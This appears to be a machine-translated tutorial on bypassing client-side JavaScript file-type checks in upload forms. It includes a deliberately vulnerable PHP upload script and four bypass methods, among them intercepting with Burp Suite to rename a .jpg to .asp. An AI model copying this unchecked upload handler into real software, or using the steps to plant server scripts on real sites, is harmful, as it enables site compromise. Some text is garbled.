One kind of js verification that we often encounter in uploading vulnerabilities is quite annoying. The method of judging whether js verification is enabled on a website cannot be judged by its judgment speed, because js verification is used for local verification on the client. , so if you upload an incorrect file format, its judgment will soon show that the file type you uploaded is incorrect, then we can judge that the website uses js verification.
js verification bypass demo code:
<?php /** * Created by cracer * Date: 15-10-7 * Time: 下午1:19 * Name: upload1.php * cracer:http://www.cracer.com/ */ //文件上传漏洞演示脚本之js验证 $uploaddir = 'uploads/'; if (isset($_POST['submit'])) { if (file_exists($uploaddir)) { if (move_uploaded_file($_FILES['upfile']['tmp_name'], $uploaddir . '/' . $_FILES['upfile']['name'])) { echo '文件上传成功,保存于:' . $uploaddir . $_FILES['upfile']['name'] . "\n"; } } else { exit($uploaddir . '文件夹不存在,请手工创建!'); } //print_r($_FILES); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html;charset=gbk"/> <meta http-equiv="content-language" content="zh-CN"/> <title>文件上传漏洞演示脚本--JS验证实例</title> <script type="text/javascript"> function checkFile() { var file = document.getElementsByName('upfile')[0].value; if (file == null || file == "") { alert("你还没有选择任何文件,不能上传!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.jpeg|.png|.gif|.bmp|"; //提取上传文件的类型 var ext_name = file.substring(file.lastIndexOf(".")); //alert(ext_name); //alert(ext_name + "|"); //判断上传文件类型是否允许上传 if (allow_ext.indexOf(ext_name + "|") == -1) { var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name; alert(errMsg); return false; } } </script> <body> <h3>文件上传漏洞演示脚本--JS验证实例</h3> <form action="" method="post" enctype="multipart/form-data" name="upload" onsubmit="return checkFile()"> <input type="hidden" name="MAX_FILE_SIZE" value="Breakthrough JS local verification solution04800"/> 请选择要上传的文件:<input type="file" name="upfile"/> <input type="submit" name="submit" value="上传"/> </form> </body> </html>
Note: It is best for the folder path and file name to be in English, otherwise an error may be reported.
# Just save the code as upload.php, and then create an uploads folder in the same directory to store the uploaded files.
js verification bypass method
JS verification is the best to bypass. It seems that there is a saying that client-based verification is unsafe. Here we have a variety of bypass methods.
How to determine whether file upload is based on client-side JS verification?
There are many methods, such as directly viewing the website source file, using a packet capture tool to check whether the client has submitted a data packet to the server, if not, using js verification, uploading a file at random, and seeing the return result.
As shown in the picture above, JS verification will pop up a prompt directly after you submit the uploaded file and terminate the file submission to the server. The bypass method is as follows:
A. We can directly delete the code related to verifying the uploaded file when uploading the file in the onsubmit event in the code.
ok After we use firebug to remove it
B. Directly change the file extensions allowed to be uploaded in the file upload JS code to the file extensions you want to upload.
ok The following two methods are relatively simple to operate. I won’t demonstrate them here. If you have any questions, just ask me on QQ.
C. Just use the local submission form and make corresponding changes.
D. Use proxy tools such as burpsuite or fiddle to submit. First change the local file to jpg, intercept it when uploading, and then change the file extension to asp.
The above 4 methods can be used freely by everyone, and they can all bypass local JS verification.
Related recommendations:
Recommended summary of related articles about js verification
Regular expression of js verification phone number and mobile phone number Formula
js to verify whether the ID card information is legal
The above is the detailed content of Breakthrough JS local verification solution. For more information, please follow other related articles on the PHP Chinese website!